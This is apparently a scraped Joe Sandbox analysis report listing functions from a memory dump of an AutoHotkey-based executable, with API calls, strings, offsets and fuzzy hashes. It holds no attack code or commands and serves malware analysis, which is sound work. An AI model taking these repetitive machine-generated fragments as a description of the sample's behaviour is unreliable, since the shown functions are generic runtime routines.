Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ClassName__itow__ultow__wcsicoll_xtow@16
String ID: 0
API String ID: 979273058-4108050209
Opcode ID: 7ad176a651efa6d3b703b918329e806830c6e3b8debd92bcedfb2c44f6b27375
Instruction ID: 699d4f2f0c0caaa5e32a8fdf62103e1cd072ee7dc703b711b64ddb99f0cd8020
Opcode Fuzzy Hash: 7ad176a651efa6d3b703b918329e806830c6e3b8debd92bcedfb2c44f6b27375
Instruction Fuzzy Hash: 2151E3715047028BE720CF68D5807BBB3E1EF84304F44882EE99A83244E3B9F989C756

Uniqueness

Uniqueness Score: -1.00%

Function 0046F0B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0046F11D
__itow.LIBCMT ref: 0046F145
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0046F19F
ShowWindow.USER32(?,00000000), ref: 0046F1FF

Part of subcall function 0046F2D0: __wcsicoll.LIBCMT ref: 0046F2EC

Strings

Submit, xrefs: 0046F0E2

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window$LongMessageSendShow__itow__wcsicoll
String ID: Submit
API String ID: 1467826441-949859957
Opcode ID: ecb7e5555a049813508f251ff30e78eb770a24bd5d9e0f3389dfe1246a00ea54
Instruction ID: 2bb8899fd6159c3eea1065ada92ce2cdefb29c53a857d0e47194e917d061230d
Opcode Fuzzy Hash: ecb7e5555a049813508f251ff30e78eb770a24bd5d9e0f3389dfe1246a00ea54
Instruction Fuzzy Hash: 1041B071908312EBC620DF58D880B57B7A5BB46B14F10472BF9A1572C1E7B8EC48C6DA

Uniqueness

Uniqueness Score: -1.00%

Function 0045E2D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 0045E2DF
__wsplitpath.LIBCMT ref: 0045E326
__wsplitpath.LIBCMT ref: 0045E33D
_wcschr.LIBCMT ref: 0045E3BF

Strings

*, xrefs: 0045E3D1

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wsplitpath_wcschr
String ID: *
API String ID: 1241525681-163128923
Opcode ID: 47cf24491be2287af42daf88249893a590b7a15575ae487e2b4de71b08e844df
Instruction ID: 5ef094470f74b44fded6e956e704babbac7a9ab082863d25abac2f595a8512bb
Opcode Fuzzy Hash: 47cf24491be2287af42daf88249893a590b7a15575ae487e2b4de71b08e844df
Instruction Fuzzy Hash: CF31C372504314AAC734AB56C896BEBB3B8EF94305F00852FE98587281FBB85648C796

Uniqueness

Uniqueness Score: -1.00%

Function 00475020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

RemoveMenu.USER32(?,?,00000000), ref: 0047504E
SetMenuItemInfoW.USER32 ref: 00475095
DeleteObject.GDI32(?), ref: 004750A7
DestroyIcon.USER32(?), ref: 004750B3

Strings

0, xrefs: 00475081

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Menu$DeleteDestroyIconInfoItemObjectRemove
String ID: 0
API String ID: 347692575-4108050209
Opcode ID: 7efa47304d38019c8308bafa05692d62d8022aee764f75ee26ddb9f99580b233
Instruction ID: 35e563700352eb1217fc5d032b2bb4fbee8669e53fa82d1c539c9e05974916d2
Opcode Fuzzy Hash: 7efa47304d38019c8308bafa05692d62d8022aee764f75ee26ddb9f99580b233
Instruction Fuzzy Hash: 663167B29016409FC720DF59C9C4867BBE9BB48314B04866EE5498B361D779EC44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004822D0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00482319

Strings

_$#@, xrefs: 00482314
function, xrefs: 0048234B, 00482354
The following %s name contains an illegal character:"%-1.300s", xrefs: 00482355
variable, xrefs: 00482344

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _wcschr
String ID: The following %s name contains an illegal character:"%-1.300s"$_$#@$function$variable
API String ID: 2691759472-3792156013
Opcode ID: 0dde0dd1c6653fe62794a84b6b302f83689ae71e5b5085a34c11b014f0bbf7ad
Instruction ID: 7a0b204ff2f2492707157217a3294892b658917644f4e6f52e0bec01070f59b0
Opcode Fuzzy Hash: 0dde0dd1c6653fe62794a84b6b302f83689ae71e5b5085a34c11b014f0bbf7ad
Instruction Fuzzy Hash: 2411CE76F0021013DB20B52AAD46BAB7398D785366F544A7BFD18D63C0E6BD9C0082EA

Uniqueness

Uniqueness Score: -1.00%

Function 004231CC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 004231D4
__wcsnicmp.LIBCMT ref: 004231F9

Strings

Local, xrefs: 004231CE
b, xrefs: 00423209
Static, xrefs: 004231F3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp
String ID: Local$Static$b
API String ID: 1038674560-465266414
Opcode ID: 3d86921ea5c0dee97fcd668dbd37909b6fd4b5b42a44ce1b6b596f20a93200f9
Instruction ID: 09eb1ad385962c4b20d4cae433f803b34183fe5cf747358a164410979fa66e27
Opcode Fuzzy Hash: 3d86921ea5c0dee97fcd668dbd37909b6fd4b5b42a44ce1b6b596f20a93200f9
Instruction Fuzzy Hash: 7101497174031595CB308E11E881B7BB3E49B61745F90442BFD4597252F27D8E8987AA

Uniqueness

Uniqueness Score: -1.00%

Function 004AA0FC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004AA10F

Part of subcall function 004AA06A: ___BuildCatchObjectHelper.LIBCMT ref: 004AA0A0

_UnwindNestedFrames.LIBCMT ref: 004AA126
___FrameUnwindToState.LIBCMT ref: 004AA134

Strings

csm, xrefs: 004AA0FE
csm, xrefs: 004AA10B, 004AA120, 004AA133, 004AA151, 004AA161

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 14e40ab7451e05e613886ddce8cd3cf3a9aa13a91e72528883753ac779b6b91f
Instruction ID: 2cdbb5ddecbb5ca9d8d50868086b2e7c4ff5037db9e2866e63c48d31fa73a3cb
Opcode Fuzzy Hash: 14e40ab7451e05e613886ddce8cd3cf3a9aa13a91e72528883753ac779b6b91f
Instruction Fuzzy Hash: 36014B31000109BBCF126F51CC45EAB7F6AEF2A348F04801AFD1814161D73ADDB1DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,03055548,?,004142A1), ref: 0040E0F3
CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd,?,03055548,?,004142A1), ref: 0040E0FE
GetLastError.KERNEL32 ref: 0040E106
CloseHandle.KERNEL32(00000000), ref: 0040E131

Strings

AHK Keybd, xrefs: 0040E0F5

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Keybd
API String ID: 2372642624-4057427925
Opcode ID: abbb98135eb446770aa7c62c1b54cfa658d1deed5df644ec86217d024136cc7f
Instruction ID: 72f4a263067a2aea77808aa17398770139b22550ab5857d119d722dd1f61f733
Opcode Fuzzy Hash: abbb98135eb446770aa7c62c1b54cfa658d1deed5df644ec86217d024136cc7f
Instruction Fuzzy Hash: 6AF0A07370532057D7706BB9ED88B5E6B94AB89BA1F05043BE604EB2D4DB788C5086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E150, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,03055548,?,004142AE), ref: 0040E163
CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse,?,03055548,?,004142AE), ref: 0040E16E
GetLastError.KERNEL32 ref: 0040E176
CloseHandle.KERNEL32(00000000), ref: 0040E1A1

Strings

AHK Mouse, xrefs: 0040E165

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: AHK Mouse
API String ID: 2372642624-1022267635
Opcode ID: 3ea4fb69d1198cdbf2dc32b39e50c643c98e8d832323ec76baffad9f7458b8f6
Instruction ID: bcb5ebbef579d0f8be566d27e679fbe8909eebe992779bd368febf2daef229fa
Opcode Fuzzy Hash: 3ea4fb69d1198cdbf2dc32b39e50c643c98e8d832323ec76baffad9f7458b8f6
Instruction Fuzzy Hash: 82F0A77370632057D7205B79ED88B5B7B949B89B61F050437E604DB2D4D7788C40856C

Uniqueness

Uniqueness Score: -1.00%

Function 0046D32D, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0046D370
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0046D433
GetWindowLongW.USER32(?,000000F0), ref: 0046D829

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ba3202242250f21ff170df36611b4b706638d1c7f4c62b1ef53de971699472a3
Instruction ID: 6ad9728afa74ee1e30f2357c0d0d19ee72cc1b085f150f761184d5993728137b
Opcode Fuzzy Hash: ba3202242250f21ff170df36611b4b706638d1c7f4c62b1ef53de971699472a3
Instruction Fuzzy Hash: EF616C79E00201CFD724DF25C844BAAB7E1FF88305F15466EE95557361EB38AC41CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00459200, Relevance: 7.6, APIs: 5, Instructions: 120windowCOMMON

Download Yara Rule

APIs

ImageList_GetIconSize.COMCTL32(?,?,?), ref: 0045928F
ImageList_AddMasked.COMCTL32(?,00000000), ref: 004592F2
DeleteObject.GDI32(00000000), ref: 00459300
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000), ref: 00459315
DestroyIcon.USER32(00000000), ref: 00459323

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: IconImageList_$DeleteDestroyMaskedObjectReplaceSize
String ID:
API String ID: 1613341713-0
Opcode ID: a56c1a64a4145df61f01752ad5beb1b37553d74ffebc2730cc2f0cb72f0885d8
Instruction ID: 684d8aabf1083f12c096b6295d7f7588fd26f6a97d3d4fab2d87e4c154b2e7ed
Opcode Fuzzy Hash: a56c1a64a4145df61f01752ad5beb1b37553d74ffebc2730cc2f0cb72f0885d8
Instruction Fuzzy Hash: 934191B1504311EBC714DF69D88496BB7E9EB88311F148A2EF859D3241D734EC19CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044C200, Relevance: 7.6, APIs: 5, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?), ref: 0044C292
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0044C2B5
GetLastError.KERNEL32 ref: 0044C2C6
CloseHandle.KERNEL32(00000000), ref: 0044C2DB
_free.LIBCMT ref: 0044C2EA

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastWrite_free
String ID:
API String ID: 4198015954-0
Opcode ID: cef284354408c27af4192f62063ece0987f704a9fc4ac4d1a8e268eead2178f5
Instruction ID: de53424e9dc6cff347b20805a8c6acfdce3a5c6fe056d560188d7f52877b23e2
Opcode Fuzzy Hash: cef284354408c27af4192f62063ece0987f704a9fc4ac4d1a8e268eead2178f5
Instruction Fuzzy Hash: 13310872A013009BE3509F649CC4F6BB7E4BB89724F08467EFD4467281D7B9AD05C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00483350, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 0048337A
__wcsnicmp.LIBCMT ref: 0048338D
__itow.LIBCMT ref: 004833A9

Part of subcall function 00497DF5: _xtow@16.LIBCMT ref: 00497E15

__wcsicoll.LIBCMT ref: 004833BA
GetWindowTextW.USER32 ref: 004833E3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ClassNameTextWindow__itow__wcsicoll__wcsnicmp_xtow@16
String ID:
API String ID: 941245113-0
Opcode ID: 9bfb7f52f2f563a29ad5827277e29cb973e0564a226f187596fd135f3dbca0c8
Instruction ID: 966cad985d4182c9f03ddd9f8aec5924f23a4a4b14582e05dff0c7977c9c8606
Opcode Fuzzy Hash: 9bfb7f52f2f563a29ad5827277e29cb973e0564a226f187596fd135f3dbca0c8
Instruction Fuzzy Hash: 7911DA737003006BD260EB65DC84DEBB7DCEB91B55F04882FF98282241DE657549C760

Uniqueness

Uniqueness Score: -1.00%

Function 0043B270, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043B281

Part of subcall function 004985DD: HeapFree.KERNEL32(00000000,00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 004985F3
Part of subcall function 004985DD: GetLastError.KERNEL32(00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 00498605

_free.LIBCMT ref: 0043B291
_free.LIBCMT ref: 0043B2BF
_free.LIBCMT ref: 0043B2D1
_free.LIBCMT ref: 0043B2E2

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: acfb6887d70999b0378b19eb145e13490125c50fc8aea0880ad1f4121c3ee6fe
Instruction ID: b0e55027eb80be5b53bcd8f97d9cdbda7df9f0979ebb3910dab7df7f6d1568e9
Opcode Fuzzy Hash: acfb6887d70999b0378b19eb145e13490125c50fc8aea0880ad1f4121c3ee6fe
Instruction Fuzzy Hash: E101B5B19007005BD630DE1AD845B5B73E4AF55320F0906BED94687341EB38F848C6E6

Uniqueness

Uniqueness Score: -1.00%

Function 0049C239, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0049C245

Part of subcall function 0049C462: __getptd_noexit.LIBCMT ref: 0049C465
Part of subcall function 0049C462: __amsg_exit.LIBCMT ref: 0049C472

__getptd.LIBCMT ref: 0049C25C
__amsg_exit.LIBCMT ref: 0049C26A
__lock.LIBCMT ref: 0049C27A
__updatetlocinfoEx_nolock.LIBCMT ref: 0049C28E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 1b1cae0fde3120a3a115fae107ab030fa5503e6f6e4e348cce3dbe703e28eee8
Instruction ID: deb29876bc525ace51904fcb4b3612afc1cfc9ed84744f8b11138953fe40d787
Opcode Fuzzy Hash: 1b1cae0fde3120a3a115fae107ab030fa5503e6f6e4e348cce3dbe703e28eee8
Instruction Fuzzy Hash: 94F09632D41710ABDE21B7B95987B593F906F01B28F11427FF044A72D2CF6C69418A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004891EF, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004892A0

Strings

4, xrefs: 00489337

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _memmove
String ID: 4
API String ID: 4104443479-4088798008
Opcode ID: 3b0b916803f7f0f6facfe538f89a706e15657e90a23c1c69e640fc88f8b54039
Instruction ID: bbdece3ebf6554d9e0f29469fcd2b9913fae75c32b7c224aa86f2776d56ebc47
Opcode Fuzzy Hash: 3b0b916803f7f0f6facfe538f89a706e15657e90a23c1c69e640fc88f8b54039
Instruction Fuzzy Hash: 71D139705097418BC728AF64D48073FB7A1BF95308F284D2EE9958B390E379ED46CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004891F4, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004892A0

Strings

4, xrefs: 00489337

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _memmove
String ID: 4
API String ID: 4104443479-4088798008
Opcode ID: 83d4787817832a6eaec7d5259be7c2f039414f74e7f33980644f7e00c07c59a1
Instruction ID: ed6e210ad3c53fb5fe60fca1bc70af073f64e91b6b3f916adf4a230c562cc368
Opcode Fuzzy Hash: 83d4787817832a6eaec7d5259be7c2f039414f74e7f33980644f7e00c07c59a1
Instruction Fuzzy Hash: B5D139705097418BC728AF54D48063FB7E1BF95308F284D2EE9958B390E379ED46CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00489201, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004892A0

Strings

4, xrefs: 00489337

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _memmove
String ID: 4
API String ID: 4104443479-4088798008
Opcode ID: 2ac60d318f6909f6fbc649932f7c87e0aa072a38ba79f578ee0c636a3aba7ce3
Instruction ID: b172a8d59c2a60f3814dd33afa63e3f97e0eb01fc4aefe7e06489f12cfd4f296
Opcode Fuzzy Hash: 2ac60d318f6909f6fbc649932f7c87e0aa072a38ba79f578ee0c636a3aba7ce3
Instruction Fuzzy Hash: 81D139705097418BC728AF54D48073FB7A1BF95308F284D2EEA898B350E379ED46CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C260, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263COMMON

Download Yara Rule

Strings

This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042C44E
This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042C3EF, 0042C40B, 0042C42F
Not allowed as an output variable., xrefs: 0042C575

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
